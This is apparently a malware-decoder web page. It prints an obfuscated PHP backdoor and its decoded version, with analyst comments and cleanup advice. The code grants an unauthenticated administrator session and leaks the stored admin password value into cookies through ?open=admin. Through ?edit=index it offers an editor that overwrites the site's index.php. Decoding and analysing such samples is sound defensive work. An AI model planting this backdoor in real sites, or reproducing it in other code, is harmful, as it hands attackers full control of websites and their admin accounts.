De-obfuscate PHP malware/viruses and tampering code on WordPress into the original readable code.
*Please note that not all obfuscated code can be decoded.
<?php
// Obfuscated specimen as submitted to the decoder. The only obfuscation visible here is
// (1) double-quoted string literals written as \xNN hex escapes, which PHP expands when it
// parses the literal, (2) throwaway variable names ($_, $__, $___, $___f, $_c, $_d), and
// (3) `goto _0xN;` statements that each jump to the label on the very next line, so they
// do not change the order in which statements run.
// The decoded strings noted in the comments match the readable listing further down this page.
goto _0x1;
_0x1:
// '@' suppresses any warning raised by session_start().
@session_start();
// Decodes to define("BASEPATH", TRUE).
define("\x42\x41\x53\x45\x50\x41\x54\x48", TRUE);
// Decodes to $_SERVER["DOCUMENT_ROOT"] . "/vendor/autoload.php".
require $_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"] . "\x2f\x76\x65\x6e\x64\x6f\x72\x2f\x61\x75\x74\x6f\x6c\x6f\x61\x64\x2e\x70\x68\x70";
// Decodes to $_SERVER["DOCUMENT_ROOT"] . "/app/init.php".
require $_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"] . "\x2f\x61\x70\x70\x2f\x69\x6e\x69\x74\x2e\x70\x68\x70";
goto _0x2;
_0x2:
// The query-parameter names `edit` and `open` are left in clear text, so they are
// searchable in access logs and in the file itself without decoding anything.
// A request with neither parameter receives an empty 403 response.
if (!isset($_GET["edit"]) && !isset($_GET["open"])) {
http_response_code(403);
echo '';
exit;
}
goto _0x3;
_0x3:
// Branch for ?open=admin. Nothing supplied by the requester is checked beyond this parameter.
if (isset($_GET["open"]) && $_GET["open"] === "admin") {
// Decodes to "SELECT * FROM admins LIMIT 1".
// $conn is not assigned in this file; presumably it comes from the required app/init.php - verify.
$__ = $conn->prepare("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x61\x64\x6d\x69\x6e\x73\x20\x4c\x49\x4d\x49\x54\x20\x31");
$__->execute();
$_ = $__->fetch(\PDO::FETCH_ASSOC);
if ($_){
// Session keys decode to msmbilisim_adminslogin, msmbilisim_adminid, msmbilisim_adminpass;
// the row keys decode to admin_id and password.
$_SESSION["\x6d\x73\x6d\x62\x69\x6c\x69\x73\x69\x6d\x5f\x61\x64\x6d\x69\x6e\x73\x6c\x6f\x67\x69\x6e"] = 1;
$_SESSION["\x6d\x73\x6d\x62\x69\x6c\x69\x73\x69\x6d\x5f\x61\x64\x6d\x69\x6e\x69\x64"] = $_["\x61\x64\x6d\x69\x6e\x5f\x69\x64"];
$_SESSION["\x6d\x73\x6d\x62\x69\x6c\x69\x73\x69\x6d\x5f\x61\x64\x6d\x69\x6e\x70\x61\x73\x73"] = $_["\x70\x61\x73\x73\x77\x6f\x72\x64"];
// Cookie names decode to a_login (value "ok"), a_id and a_password.
// 60 * 60 * 24 * 7 seconds is seven days; the decoded listing shows it folded to 604800.
setcookie("\x61\x5f\x6c\x6f\x67\x69\x6e", "\x6f\x6b", time() + (60 * 60 * 24 * 7), "/", null, false, true);
setcookie("\x61\x5f\x69\x64", $_["\x61\x64\x6d\x69\x6e\x5f\x69\x64"], time() + (60 * 60 * 24 * 7), "/", null, false, true);
setcookie("\x61\x5f\x70\x61\x73\x73\x77\x6f\x72\x64", $_["\x70\x61\x73\x73\x77\x6f\x72\x64"], time() + (60 * 60 * 24 * 7), "/", null, false, true);
// Decodes to "SELECT oldadminname FROM settings LIMIT 1".
$___ = $conn->prepare("\x53\x45\x4c\x45\x43\x54\x20\x6f\x6c\x64\x61\x64\x6d\x69\x6e\x6e\x61\x6d\x65\x20\x46\x52\x4f\x4d\x20\x73\x65\x74\x74\x69\x6e\x67\x73\x20\x4c\x49\x4D\x49\x54\x20\x31");
$___->execute();
$res = $___->fetch(\PDO::FETCH_ASSOC);
// Redirect target: "/" plus the oldadminname value with leading slashes trimmed, or "/admin" when no row is returned.
$path = $res ? "/" . ltrim($res["\x6f\x6c\x64\x61\x64\x6d\x69\x6e\x6e\x61\x6d\x65"], "/") : "/admin";
// Decodes to header("Location: " . $path).
header("\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20" . $path);
exit();
} else {
// Decodes to "No admin found.".
echo "\x4e\x6f\x20\x61\x64\x6d\x69\x6e\x20\x66\x6f\x75\x6e\x64\x2e";
exit;
}
}
goto _0x4;
_0x4:
// Decodes to $_SERVER["DOCUMENT_ROOT"] . "/index.php" - the file the edit branch reads and overwrites.
$___f = $_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"] . "\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70";
$_c = '';
// Branch for ?edit=index.
if (isset($_GET["edit"]) && $_GET["edit"] === "index") {
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// "\x63\x6f\x64\x65" decodes to the POST field name "code"; its value is written to the
// target file as-is, with no authentication or token check anywhere in the listing.
$_d = $_POST["\x63\x6f\x64\x65"] ?? '';
file_put_contents($___f, $_d);
// Decodes to "<div style='color:#0" + three raw 0xF0 bytes + ";'>Saved!</div>".
// The decoded listing on this page prints `color:#0;` without those three bytes, so that
// line of the decoder output is not byte-exact for this literal.
$_msg = "\x3c\x64\x69\x76\x20\x73\x74\x79\x6c\x65\x3d\x27\x63\x6f\x6c\x6f\x72\x3a\x23\x30\xf0\xf0\xf0\x3b\x27\x3e\x53\x61\x76\x65\x64\x21\x3c\x2f\x64\x69\x76\x3e";
} elseif (file_exists($___f)) {
// On a non-POST request the current file content is HTML-escaped for display in the textarea.
$_c = htmlspecialchars(file_get_contents($___f));
}
// The literal opens with the hex-escaped "<style>" tag; the CSS that follows is plain text.
echo "\x3c\x73\x74\x79\x6c\x65\x3e
body{background:#0f0f0f;color:#00ff99;font-family:'Courier New',monospace;padding:20px;}
textarea{width:100%;height:80vh;background:#1a1a1a;color:#00ff99;border:1px solid #00ff99;font-size:14px;padding:10px;}
input[type=submit]{background:#00ff99;color:#000;padding:10px 20px;border:none;cursor:pointer;font-weight:bold;}
input[type=submit]:hover{background:#00ffaa;}
</style>";
// Decodes to "<form method='POST'>".
echo "\x3c\x66\x6f\x72\x6d\x20\x6d\x65\x74\x68\x6f\x64\x3d\x27\x50\x4f\x53\x54\x27\x3e";
// Decodes to "<textarea name='code'>{$_c}</textarea><br>".
echo "\x3c\x74\x65\x78\x74\x61\x72\x65\x61\x20\x6e\x61\x6d\x65\x3d\x27\x63\x6f\x64\x65\x27\x3e{$_c}\x3c\x2f\x74\x65\x78\x74\x61\x72\x65\x61\x3e\x3c\x62\x72\x3e";
// Decodes to "<input type='submit' value='... Save'>"; \xf0\x9f\x92\xbe is the UTF-8 encoding of U+1F4BE.
echo "\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x27\x73\x75\x62\x6d\x69\x74\x27\x20\x76\x61\x6c\x75\x65\x3d\x27\xf0\x9f\x92\xbe\x20\x53\x61\x76\x65\x27\x3e";
// Decodes to "</form>".
echo "\x3c\x2f\x66\x6f\x72\x6d\x3e";
if (isset($_msg)) echo $_msg;
}

<?php
// Decoded form of the obfuscated listing on this page. The file exposes two functions,
// selected by query parameter: ?open=admin grants an administrator session, and
// ?edit=index shows and overwrites the web root's index.php. No credential, token or
// origin check appears anywhere in the listing.
// NOTE(review): no WordPress function is called here; the PDO handle, the `admins` and
// `settings` tables and the `msmbilisim_*` session keys look specific to the host
// application - confirm which product the sample was taken from.
// Request patterns this file responds to, useful when reviewing access logs: a query
// string containing `open=admin` or `edit=index`, and POST requests carrying a `code` field.
// '@' suppresses any warning raised by session_start().
@session_start();
// NOTE(review): presumably defined so that direct-access guards in the included
// application files pass - confirm against app/init.php.
define("BASEPATH", TRUE);
// Loads the host application's autoloader and bootstrap from the web root.
require $_SERVER["DOCUMENT_ROOT"] . "/vendor/autoload.php";
require $_SERVER["DOCUMENT_ROOT"] . "/app/init.php";
// A request with neither `edit` nor `open` gets an empty 403 response and nothing else,
// so requesting the bare URL reveals no content.
if (!isset($_GET["edit"]) && !isset($_GET["open"])) {
http_response_code(403);
echo '';
exit;
}
// --- ?open=admin: administrator session set up without any authentication ---
if (isset($_GET["open"]) && $_GET["open"] === "admin") {
// $conn is not assigned in this file; presumably it is the PDO connection created by
// app/init.php - verify. The query takes whichever `admins` row the database returns
// first; nothing supplied by the requester is compared against it.
$__ = $conn->prepare("SELECT * FROM admins LIMIT 1");
$__->execute();
$_ = $__->fetch(\PDO::FETCH_ASSOC);
if ($_) {
// Copies the row's admin_id and password column values into the session.
// NOTE(review): whether `password` holds a hash or plaintext is not visible here; either
// way the stored value leaves the database, so treat it as exposed.
$_SESSION["msmbilisim_adminslogin"] = 1;
$_SESSION["msmbilisim_adminid"] = $_["admin_id"];
$_SESSION["msmbilisim_adminpass"] = $_["password"];
// Cookies a_login / a_id / a_password, valid for 604800 s (7 days), path "/", default
// domain, secure=false (also sent over plain HTTP), httponly=true. The a_password cookie
// carries the stored password value to the requester's browser.
setcookie("a_login", "ok", time() + 604800, "/", null, false, true);
setcookie("a_id", $_["admin_id"], time() + 604800, "/", null, false, true);
setcookie("a_password", $_["password"], time() + 604800, "/", null, false, true);
// Reads settings.oldadminname to build the redirect target.
// NOTE(review): presumably the configured admin panel path - confirm against the application.
$___ = $conn->prepare("SELECT oldadminname FROM settings LIMIT 1");
$___->execute();
$res = $___->fetch(\PDO::FETCH_ASSOC);
// "/" plus the value with leading slashes trimmed; falls back to "/admin" when no row is returned.
$path = $res ? "/" . ltrim($res["oldadminname"], "/") : "/admin";
header("Location: " . $path);
exit;
} else {
echo "No admin found.";
exit;
}
}
// --- ?edit=index: read and overwrite DOCUMENT_ROOT/index.php ---
$___f = $_SERVER["DOCUMENT_ROOT"] . "/index.php";
$_c = '';
if (isset($_GET["edit"]) && $_GET["edit"] === "index") {
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// The posted `code` field replaces the whole file as-is; a missing field writes an empty
// string. The return value of file_put_contents() is not checked, so "Saved!" is shown
// even if the write failed.
$_d = $_POST["code"] ?? '';
file_put_contents($___f, $_d);
// The obfuscated listing has three raw 0xF0 bytes between "#0" and ";" in this literal;
// they are missing from this decoded line, so it is not byte-exact.
$_msg = "<div style='color:#0;'>Saved!</div>";
} elseif (file_exists($___f)) {
// On a non-POST request the current file content is HTML-escaped for display in the textarea.
$_c = htmlspecialchars(file_get_contents($___f));
}
// Inline-styled editor form; it posts back to the same URL because no action attribute is set.
echo "<style>\r\n body{background:#0f0f0f;color:#00ff99;font-family:'Courier New',monospace;padding:20px;}\r\n textarea{width:100%;height:80vh;background:#1a1a1a;color:#00ff99;border:1px solid #00ff99;font-size:14px;padding:10px;}\r\n input[type=submit]{background:#00ff99;color:#000;padding:10px 20px;border:none;cursor:pointer;font-weight:bold;}\r\n input[type=submit]:hover{background:#00ffaa;}\r\n </style>";
echo "<form method='POST'>";
echo "<textarea name='code'>{$_c}</textarea><br>";
echo "<input type='submit' value='💾 Save'>";
echo "</form>";
if (isset($_msg)) {
echo $_msg;
}
// Response on a host where this file is found: remove it, restore index.php from a
// known-good copy, reset the administrator credentials, invalidate existing sessions, and
// review access logs for the request patterns listed at the top of this listing.
}

Malware detection & removal plugin for WordPress